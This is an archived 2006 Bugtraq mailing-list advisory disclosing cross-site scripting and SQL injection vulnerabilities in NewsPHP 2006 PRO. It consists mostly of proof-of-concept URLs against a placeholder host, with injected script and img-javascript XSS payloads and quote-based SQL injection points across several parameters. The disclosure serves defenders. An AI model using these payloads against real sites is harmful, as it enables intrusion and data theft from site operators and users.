lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Message-ID: <20060629104647.12695.qmail@securityfocus.com> Date: 29 Jun 2006 10:46:47 -0000 From: securityconnection@...il.com To: bugtraq@...urityfocus.com Subject: NewsPHP 2006 PRO XSS SQL injection Vulnerability http://newsphp.com ------------------ Cross Site Scripting (XSS) ------------------ http://target.xx/?words=%3Cscript%3Ealert(/Ellipsis%20Security%20Test/)%3C/script%3E&where=1 http://target.xx/index.php?id=%3Cscript%3Ealert(%22Ellipsis%20Security%20Test%22)%3C/script%3E http://target.xx/index.php?cat_id='%3E%3Cscript%3Ealert(%22Ellipsis%20Security%20Test%22)%3C/script%3E http://target.xx/index.php?cat_id=Business&tim=%22%3E%3Cscript%3Ealert(%22Ellipsis%20Security%20Test%22)%3C/script%3E http://target.xx/index.php?tim=%22%3E%3Cscript%3Ealert('Ellipsis%20Security%20Test')%3C/script%3E http://target.xx/index.php?id=%3Cimg%20src=javascript:alert(%22EllipsisSecuritTest%22)%3E ------------- SQL injection ------------- http://target.xx/?words='[SQL] http://target.xx/?words=%27[SQL]&where=1 http://target.xx/index.php?id='[SQL] http://target.xx/index.php?topmenuitem='[SQL] http://target.xx/index.php?cat_id='[SQL] http://target.xx/index.php?words='[SQL]&where=1 http://target.xx/inc/rss_feed.php?category='[SQL]&amount=10 ----------------- Ellipsis Security http://ellsec.org